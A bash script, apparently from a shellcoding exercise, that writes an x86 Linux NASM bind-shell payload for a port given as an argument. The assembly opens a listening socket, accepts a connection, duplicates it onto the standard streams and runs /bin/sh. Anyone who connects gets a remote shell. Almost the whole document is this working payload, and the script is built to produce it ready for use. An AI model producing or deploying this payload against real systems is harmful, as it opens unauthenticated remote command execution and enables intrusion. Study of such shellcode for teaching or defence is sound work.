#!/bin/bash # Usage: ./template.sh # Outputs file ./tcp-bind-.nasm HEXSTRING=$(printf "%04x" $1 | sed 's/[a-f0-9]\{2\}/& /g') byte1=$(echo $HEXSTRING | cut -f1 -d' ' | sed 's/.*/0x&/') byte1=$([ "$byte1" == "0x00" ] && echo "dl" || echo $byte1) byte2=$(echo $HEXSTRING | cut -f2 -d' ' | sed 's/.*/0x&/') byte2=$([ "$byte2" == "0x00" ] && echo "dl" || echo $byte2) TEMPLATE=" section .text global main main: xor edx, edx ; Zero-out EDX for later use xor edi, edi ; Zero-out EDI xor edi, 0x66 ; Set 0x66 in EDI for later ; sockfd = socket(PF_INET, SOCK_STREAM, 0) mov eax, edi ; SYS_SOCKETCALL mov ebx, edx ; Zero-out EBX mov bl, 0x1 ; SYS_SOCKET push edx ; 0 push byte 0x1 ; SOCK_STREAM push byte 0x2 ; PF_INET mov ecx, esp ; Address of socket arguments int 0x80 ; Exec syscall ; We need the result later mov esi, eax ; Store ref to sockfd in ESI ; bind(sockid, struct addr, addrlen) mov eax, edi ; SYS_SOCKETCALL inc ebx ; SYS_BIND ; Setup struct addr push edx ; (this is why we needed EDX at line 5) sub esp, 2 ; Move ESP so we don't overwrite ip-addr mov byte [esp], $byte1; Push port byte 1 mov byte [esp+1], $byte2; Push port byte 2 push word 0x2 ; AF_INET mov ecx, esp ; Store struct in ECX ; Setup bind arguments push 0x10 ; Length addr (16) push ecx ; Struct addr push esi ; Ref to sockfd mov ecx, esp ; Address of bind arguments int 0x80 ; Exec syscall ; listen(sockid, 2) mov eax, edi ; SYS_SOCKETCALL push ebx ; Argument 2 inc ebx ; SYS_LISTEN inc ebx ; (2 bytes instead of 3 for add ebx, 0x2) ; Setup arguments push esi ; Ref to sockid mov ecx, esp ; Address of listen arguments int 0x80 ; Exec syscall ; socketid = accept(sockfd, null, null) mov eax, edi ; SYS_SOCKETCALL inc ebx ; SYS_ACCEPT push edx ; NULL (this is also why we needed EDX at line 5) push esi ; Ref to sockid mov ecx, esp ; Address of accept arguments int 0x80 ; Exec syscall ; dup2(socketid, 0) mov ebx, eax ; Ref to socketid xor eax, eax ; Zero-out EAX xor ecx, ecx ; Zero-out ECX mov cl, 0x2 ; Set counter duploop: mov al, 0x3f ; SYS_DUP2 int 0x80 ; Exec syscall dec ecx ; Decrement ECX jns duploop ; Loop ; execve(//bin/sh, NULL, NULL) xor eax, eax ; Zero-out EAX mov al, 0x0b ; SYS_EXECVE push edx ; Push NULL character to stack push 0x68732f6e ; hs/n push 0x69622f2f ; ib// mov ebx, esp ; Ref to //bin/sh from stack inc ecx ; ECX to 0 int 0x80 ; Exec syscall " echo "$TEMPLATE" > tcp-bind-$1.nasm